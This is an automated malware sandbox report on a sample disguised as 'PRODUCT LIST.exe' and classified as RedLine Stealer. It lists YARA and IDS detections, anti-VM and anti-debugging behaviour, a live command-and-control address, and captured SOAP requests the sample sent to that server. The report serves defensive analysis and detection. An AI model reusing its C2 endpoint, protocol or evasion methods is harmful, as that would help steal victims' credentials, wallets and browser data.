
Windows Analysis Report
PRODUCT LIST.exe

Overview

General Information

Sample name:PRODUCT LIST.exe
Analysis ID:1561829
MD5:a9b805862ccee6848ce91ef51a31f71d
SHA1:4ca749b30f879945324811f5924996765aa7d2e4
SHA256:9bdef064f9693bbae4a073b09a795c7b27e7486c10b3c7d920019ca3729bb434
Tags:exegeorouuser-NDA0E

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PRODUCT LIST.exe (PID: 5032 cmdline: "C:\Users\user\Desktop\PRODUCT LIST.exe" MD5: A9B805862CCEE6848CE91EF51A31F71D)
    • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["104.219.234.170:16383"], "Bot Id": "Ammy"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  Strings:
  • 0x133ca:$a4: get_ScannedWallets
  • 0x12228:$a5: get_ScanTelegram
  • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
  • 0x10e6a:$a7: <Processes>k__BackingField
  • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1079e:$a9: <ScanFTP>k__BackingField
Process Memory Space: PRODUCT LIST.exe PID: 5032 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: PRODUCT LIST.exe PID: 5032 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
0.2.PRODUCT LIST.exe.1f0000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.PRODUCT LIST.exe.1f0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.2.PRODUCT LIST.exe.1f0000.0.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  Strings:
  • 0x137ca:$a4: get_ScannedWallets
  • 0x12628:$a5: get_ScanTelegram
  • 0x1344e:$a6: get_ScanGeckoBrowsersPaths
  • 0x1126a:$a7: <Processes>k__BackingField
  • 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x10b9e:$a9: <ScanFTP>k__BackingField
0.2.PRODUCT LIST.exe.1f0000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  Strings:
  • 0x1068a:$u7: RunPE
  • 0x13d41:$u8: DownloadAndEx
  • 0x9330:$pat14: , CommandLine:
  • 0x13279:$v2_1: ListOfProcesses
  • 0x1088b:$v2_2: get_ScanVPN
  • 0x1092e:$v2_2: get_ScanFTP
  • 0x1161e:$v2_2: get_ScanDiscord
  • 0x1260c:$v2_2: get_ScanSteam
  • 0x12628:$v2_2: get_ScanTelegram
  • 0x126ce:$v2_2: get_ScanScreen
  • 0x13416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x13709:$v2_2: get_ScanBrowsers
  • 0x137ca:$v2_2: get_ScannedWallets
  • 0x137f0:$v2_2: get_ScanWallets
  • 0x13810:$v2_3: GetArguments
  • 0x11ed9:$v2_4: VerifyUpdate
  • 0x167ee:$v2_4: VerifyUpdate
  • 0x13bca:$v2_5: VerifyScanRequest
  • 0x132c6:$v2_6: GetUpdates
  • 0x167cf:$v2_6: GetUpdates
No Sigma rule has matched

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T11:49:11.146262+0100 | 2045000 | 1 | Malware Command and Control Activity Detected | 104.219.234.170 | 16383 | 192.168.2.5 | 49704 | TCP
2024-11-24T11:49:06.021573+0100 | 2849662 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 104.219.234.170 | 16383 | TCP
2024-11-24T11:49:11.719835+0100 | 2849351 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 104.219.234.170 | 16383 | TCP
2024-11-24T11:49:19.018903+0100 | 2848200 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 104.219.234.170 | 16383 | TCP
2024-11-24T11:49:17.537122+0100 | 2849352 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 104.219.234.170 | 16383 | TCP

AV Detection

Source: PRODUCT LIST.exe | Avira: detected
Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["104.219.234.170:16383"], "Bot Id": "Ammy"}
Source: PRODUCT LIST.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PRODUCT LIST.exe | Joe Sandbox ML: detected
Source: PRODUCT LIST.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: PRODUCT LIST.exe, 00000000.00000002.2197239004.0000000000216000.00000040.00000001.01000000.00000003.sdmp

Networking

Source: Network traffic | Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49707 -> 104.219.234.170:16383
Source: Network traffic | Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49704 -> 104.219.234.170:16383
Source: Network traffic | Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 104.219.234.170:16383 -> 192.168.2.5:49704
Source: Network traffic | Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49704 -> 104.219.234.170:16383
Source: Network traffic | Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49706 -> 104.219.234.170:16383
Source: Malware configuration extractor | URLs: 104.219.234.170:16383
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 16383
Source: unknown | Network traffic detected: HTTP traffic on port 16383 -> 49707
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 104.219.234.170:16383
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
  Host: 104.219.234.170:16383
  Content-Length: 137
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
  Host: 104.219.234.170:16383
  Content-Length: 144
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
  Host: 104.219.234.170:16383
  Content-Length: 20789
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
  Host: 104.219.234.170:16383
  Content-Length: 20781
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: DATAWAGONUS DATAWAGONUS
Source: unknown | TCP traffic detected without corresponding DNS query: 104.219.234.170 (this entry is repeated 47 times in the report)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ip.sb
Source: unknown | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
  Host: 104.219.234.170:16383
  Content-Length: 137
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.219.234.170:16383
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.219.234.170:16383/
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.219.234.170:16383t-
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003433000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip
Source: PRODUCT LIST.exe | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
Source: PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: PRODUCT LIST.exe | String found in binary or memory: https://api.ipify.orgcoo
Source: PRODUCT LIST.exe | String found in binary or memory: https://api.ipify.orgcookies//setti
Source: PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: PRODUCT LIST.exe | Static PE information: section name:
Source: PRODUCT LIST.exe | Static PE information: section name:
Source: PRODUCT LIST.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_0100E7B0
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_0100DC90
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_064D96D0
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_064D4508
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_064DD5C8
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_064D33C0
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_064DDAD0
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Code function: 0_2_064D1210
Source: PRODUCT LIST.exe | Binary or memory string: OriginalFilename vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefirefox.exe0 vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ${q,\\StringFileInfo\\000004B0\\OriginalFilename vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamechrome.exe< vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ${q,\\StringFileInfo\\040904B0\\OriginalFilename vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameIEXPLORE.EXED vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ${q,\\StringFileInfo\\080904B0\\OriginalFilename vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe> vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2198304415.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000000.2034884508.0000000000214000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameImplosions.exe4 vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameImplosions.exe4 vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe | Binary or memory string: OriginalFilenameImplosions.exe4 vs PRODUCT LIST.exe
Source: PRODUCT LIST.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: PRODUCT LIST.exe | Static PE information: Section: ZLIB complexity 1.0006031709558822
Source: PRODUCT LIST.exe | Static PE information: Section: .boot ZLIB complexity 0.9948373809878013
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/39@1/1
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | File created: C:\Users\user\AppData\Local\Yandex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | File created: C:\Users\user\AppData\Local\Temp\tmp826A.tmp
Source: C:\Users\user\Desktop\PRODUCT LIST.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tmp2E4D.tmp.0.dr, tmp82CD.tmp.0.dr, tmp826A.tmp.0.dr, tmp82AB.tmp.0.dr, tmp829B.tmp.0.dr, tmp82BC.tmp.0.dr, tmp2E4C.tmp.0.dr, tmp827B.tmp.0.dr, tmp2E5F.tmp.0.dr, tmp2E70.tmp.0.dr, tmp2E71.tmp.0.dr, tmp2E5E.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PRODUCT LIST.exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\PRODUCT LIST.exe "C:\Users\user\Desktop\PRODUCT LIST.exe"
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeSection loaded: kernel.appcore.dllJump to behavior
